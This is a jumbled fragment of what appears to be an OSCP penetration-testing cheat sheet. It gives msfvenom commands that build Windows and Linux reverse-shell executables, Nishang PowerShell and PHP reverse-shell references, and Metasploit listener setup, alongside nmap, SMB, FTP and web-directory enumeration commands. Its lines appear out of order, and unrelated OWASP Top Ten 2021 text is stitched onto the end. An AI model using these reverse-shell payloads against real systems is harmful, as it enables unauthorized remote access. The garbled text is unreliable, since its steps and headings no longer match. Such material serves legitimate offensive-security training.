

msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe -o reverse.exe
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe -o reverse.exe
msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= -f elf > shell
msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT= -f elf > shell
Metasploit System Binaries
# Linux reverse shell - Staged
Invoke-PowerShellTcp -Reverse -IPAddress -Port
Netcat for Windows available here
# PowerShell
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
/usr/share/webshells/php/php-reverse-shell
PHP reverse shell available here or locally
msf(exploit/multi/handler)> set LHOST
# or
msf(exploit/multi/handler)> set payload path/to/payload
Shells / Payloads
Universal Listeners
# Netcat
# Find mount points on the target where SUID programs and scripts can be run from
# for ip in $(seq 1 254); do echo 10.11.1.$ip; done > snmp-ips
smbclient //$ip/share -N --option='client min protocol=NT1'
smbclient -L \\$ip -N --option='client min protocol=NT1'

To check access type using smbclient, it's best to access each share, read a file, and write a file. Note: smbmap will state the access type available; smbclient will NOT.
msf> use auxiliary/scanner/smb/smb_version
General enumeration
nmap -Pn -n -p139,445 --script smb-* $ip
WordPress, use API
wpscan --url -e p,t,u --detection-mode aggressive > wpscan.log
Drupal, found here
droopescan scan drupal -t 32
gobuster dir -u -w /wordlist -o gobust_txt.out -x txt
gobuster dir -u -w /wordlist -o gobust_php.out -x php
gobuster dir -u -w /wordlist -o gobust.out

# Use CMS specific wordlist if one is found
Scanning each sub-domain and interesting directory is a good idea
# Use small common wordlist first
View-Source of pages to find interesting comments, directories, technologies, web application being used, etc.
Get web server, version, potential OS
curl -i
Use Wappalyzer to identify technologies, web server, OS, database server deployed
Run this script with the following wordlist: /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Uploading a binary or webshell
ftp> binary
Additional banner grabbing
ssh
53 - DNS
# Get nameservers and domain name of the IP address
Nmap script scanning - will reveal anonymous access
nmap -Pn -n -vvv -p21 -sC -sV $ip
Checking anonymous access manually
ftp $ip
Easy view of FTP content - Browse to: ftp://$ip
# All scans, consecutively: Quick, Targeted, UDP, All ports, Vuln scan, CVE scan, Gobuster, Nikto

UDP Scanning
sudo nmap -Pn -n -vvv -sU -oN nmap/udp $ip
Automated nmap scanning (my preference is nmapAutomator, never missed a port)
# It is recommended to scan ONE IP at a time
Targeted scanning
nmap -Pn -n -vvv -p22,80 -oN nmap/targeted $ip
Scan all ports
nmap -Pn -n -vvv -p- -oN nmap/allports $ip
If no ports are found, scan in parts
nmap -Pn -n -vvv -p1-500 -oN nmap/partial $ip
Initial scan
nmap -Pn -n -vvv -oN nmap/initial $ip
This mapping is based on the OWASP Top Ten 2021 version.
OSCP Cheatsheet
General Enumeration - Nmap
This cheat sheet will help users of the OWASP Top Ten identify which cheat sheets map to each security category. It represents a broad consensus about the most critical security risks to web applications. The OWASP Top Ten is a standard awareness document for developers and web application security.
OWASP Top Ten 2021: Related Cheat Sheets
Insecure Direct Object Reference Prevention
A06:2021 – Vulnerable and Outdated Components
A07:2021 – Identification and Authentication Failures
A08:2021 – Software and Data Integrity Failures
A09:2021 – Security Logging and Monitoring Failures
A10:2021 – Server-Side Request Forgery (SSRF)
